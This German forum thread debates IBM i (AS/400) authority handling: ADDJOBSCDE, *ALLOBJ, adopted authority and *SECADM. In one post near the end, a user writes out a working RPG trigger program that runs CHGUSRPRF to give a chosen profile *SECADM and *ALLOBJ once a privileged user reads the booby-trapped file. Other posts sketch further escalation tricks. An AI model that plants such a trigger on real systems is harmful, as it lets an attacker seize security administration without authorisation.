Mit Java holt man sich Sicherheitslücken ins Haus...

[BenderD]

... mit ADDJOBSCDE kann man Einschränkungen des SBMJOB umgehen, die Sicherheitsrelevant sind. Temporäre *ALLOBJ Berechtigung, auch per adopted authority geerbte, reicht aus, um sich alle Berechtigungen selber zu vergeben.

D*B

[holgerscherer]

Ich kann mich dunkel erinnern, in irgendeinem Forumspost was von "by design" gelesen zu haben. Kommentare gebe ich bekanntlich selten ab
-h

[BenderD]

"by design"

... Sicherheitslücken by design? das macht es ja noch schlimmer.

D*B

[EFueloep]

... Temporäre *ALLOBJ Berechtigung, auch per adopted authority geerbte, reicht aus, um sich alle Berechtigungen selber zu vergeben.

Na ja, dies ist aber dann keine Sicherheitslücke. Wenn ich mit einem User temporär *ALLOBJ und eine Command Zeile habe dann ist natürlich klar, das ich alles machen kann.
Dazu brauche ich dann gar nicht mehr ADDJOBSCDE.

Stellt sich nur die Frage wieso müssen immer so viele User *ALLOBJ Sonderrechte haben?

Dies ist nämlich leider die "einfache" (eigentlich total unsinnige!) Methode vieler SW Häuser allen Berechtigungsproblemen aus dem Weg zu gehen. Sie lassen die Applikation nur mit Usern, die *ALLOBJ haben laufen.

[BenderD]

... dem ist so nicht zuzustimmen, *ALLOBJ impliziert keineswegs *SECADM und das aus gutem Grund.

[Fuerchau]

Aber, wie Dieter schon schreibt und ich schon vielfach nachgewiesen habe, mit *ALLOBJ kann ich mir *SECADM beschaffen.

[BenderD]

... und *ALLOBJ kriege ich schon, wenn ich ein Programm finde, das adopted Authority weitergibt und noch was über *LIBL aufruft; und falls ich keine Commandline habe, fällt mir auch noch etliches ein, und falls da ein Tool sitzt, das andere Aufruf Interfaces überwacht, läuft das wieder unter *ALLOBJ und ruft was auf...

D*B

[holgerscherer]

... und *ALLOBJ kriege ich schon, wenn ich ein Programm finde, das adopted Authority weitergibt und noch was über *LIBL aufruft; und falls ich keine Commandline habe, fällt mir auch noch etliches ein, und falls da ein Tool sitzt, das andere Aufruf Interfaces überwacht, läuft das wieder unter *ALLOBJ und ruft was auf...
D*B

Erste Regel ist halt - LMTCPB(*YES) für alle! Und dann sehen wir weiter, wer gute Argumente hat...

Neulich auch gesehen: Signon-Programm für alle *SECOFR mit zweiter Passwort-Nachfrage zur Sicherheit. Aber vergessen, dass man beim Anmelden als Startprogramm auch QCMD angeben kann

-h

[BenderD]

... haste schon mal einen Programmierer mit LMTCB(*YES) gesehen?
D*B

[CKA]

Aber, wie Dieter schon schreibt und ich schon vielfach nachgewiesen habe, mit *ALLOBJ kann ich mir *SECADM beschaffen.

aha und wie ? würde mich echt interessieren ob man *secadm rechte beschaffen kann ...

[malzusrex]

Mit Gedult und Spucke

spontan fällt mir da folgendes ein:

1.) Schreibe ein kleines Triggerprogramm

PHP-Code:

h dftactgrp(*no) bnddir('QC2LE')                                           
h datfmt(*dmy.) timfmt(*hms:) datedit(*dmy.) decedit('0,') debug(*yes)     
d True            c                   *On                                  
d False           c                   *Off                                 
d parm1           ds         32768                                         
d parm2           ds                                                       
d system          pr            10i 0 extproc('system')                    
d                                 *   value options(*string)               
c     *Entry        PList                                                  
c     parm1         parm                    parm1                          
c     parm2         parm                    parm2                          
c                   Eval       *inlr = True                                
c                   CallP      System( 'chgusrprf usrprf(MyUser) ' +         
c                                      ' spcaut(*Secadm *AllObj)' ) 


2.) Trigger auf eine Datei klemmen die häufig benötigt, aber eben auch mal frei ist um den trigger ran zu tackern. AUf die Read-Op reicht ja

3.) Warten bis ein User mit ausreichend Berechtigung auf der Datei vorbei schaut.

Und schon hat man *SECADM

Gruß
Ronald

[nico1964]

Und wenn Du dann noch Glück hast und täglich ein IPL stattfindet, dann hast überhaupt kein Problem den richtigen Zeitpunkt zu erwischen